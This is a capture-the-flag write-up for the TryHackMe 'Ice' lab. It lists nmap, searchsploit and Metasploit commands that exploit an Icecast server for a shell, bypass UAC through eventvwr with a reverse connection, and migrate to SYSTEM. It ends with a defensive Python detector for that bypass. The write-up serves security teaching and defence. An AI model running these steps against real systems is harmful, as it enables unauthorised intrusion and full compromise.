TryHackMe – Ice Writeup

Ice is a beginner-level Windows machine on TryHackMe. The machine runs an Icecast media server on one of its ports. We exploit this service to gain a remote shell on the machine. The privilege escalation is done with the bypassuac_eventvwr exploit and by exploiting the SeTakeOwnershipPrivilege to gain SYSTEM on the remote machine.

Connecting to the TryHackMe VPN:
1] First download the VPN file from the access page of TryHackMe
2] Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3] Once the “Initialization Sequence Completed” message appears on the screen, you are connected to the TryHackMe network
4] You can access the machine at the given IP
Scanning:
1] First let’s do an nmap scan on our target at 10.10.219.165
nmap -sV -A -p- 10.10.219.165
-sV : to get the service versions on each port
-A : to enable OS detection, version detection, script scanning and traceroute
-p- : to scan all 65535 ports
We get the following details from our scan

Enumeration:
2] We can see an open port running the Icecast streaming media server, so first let’s search for any exploits related to this service using searchsploit
searchsploit icecast

Gaining Access:
3] Since there is a metasploit module, first let’s try that
msfconsole
search icecast

4] Let’s try this exploit
use 0
set rhosts 10.10.219.165
exploit

Privilege Escalation:
5] Now let’s background this session (Ctrl+Z) and try to escalate our privileges using the local exploit suggester module in Metasploit
search local_exploit_suggester
use 0
set session 2
exploit

6] Let’s try the first suggested exploit, and move on to the rest only if it doesn’t work

use exploit/windows/local/bypassuac_eventvwr
set session 2
set lhost 10.10.13.20
exploit

7] Now let’s check which privileges this user has
getprivs

8] We have the SeTakeOwnership privilege, so let’s migrate to any process running as SYSTEM
ps
migrate 816

9] Now we are System on the machine
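
For the defensive side of step 6, the following added example (not part of the original writeup) flags the two artefacts the eventvwr UAC bypass leaves behind: a per-user `mscfile\shell\open\command` registry handler, and a child process of eventvwr.exe other than mmc.exe. The event records use Sysmon field names (EventID 13 and 1) but are constructed sample data, and `detect_eventvwr_bypass` is a hypothetical helper name.

```python
import re

# Registry path the eventvwr.exe UAC bypass relies on: a per-user handler for
# the "mscfile" class. Matched as a substring so both the
# HKU\<SID>\Software\Classes and HKU\<SID>_Classes forms are covered.
HIJACK_KEY = re.compile(r"\\mscfile\\shell\\open\\command", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_eventvwr_bypass(events):
    """Return a list of (reason, event) findings.

    events: dicts using Sysmon field names
    (EventID 13 = registry value set, EventID 1 = process creation).
    """
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13 and HIJACK_KEY.search(ev.get("TargetObject", "")):
            findings.append(("mscfile handler set in user hive", ev))
        elif eid == 1 and basename(ev.get("ParentImage", "")) == "eventvwr.exe":
            # Event Viewer normally starts only mmc.exe.
            if basename(ev.get("Image", "")) != "mmc.exe":
                findings.append(("unexpected child of eventvwr.exe", ev))
    return findings

# Constructed sample events (not captured from the Ice machine).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe"},
    {"EventID": 13, "Image": r"C:\Users\demo\AppData\Local\Temp\sample.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001_Classes\mscfile\shell\open\command\(Default)",
     "Details": r"C:\Users\demo\AppData\Local\Temp\sample.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Users\demo\AppData\Local\Temp\sample.exe"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Example\Setting",
     "Details": "1"},
]

if __name__ == "__main__":
    for reason, ev in detect_eventvwr_bypass(SAMPLE_EVENTS):
        print(reason, "->", ev.get("TargetObject") or ev.get("Image"))
```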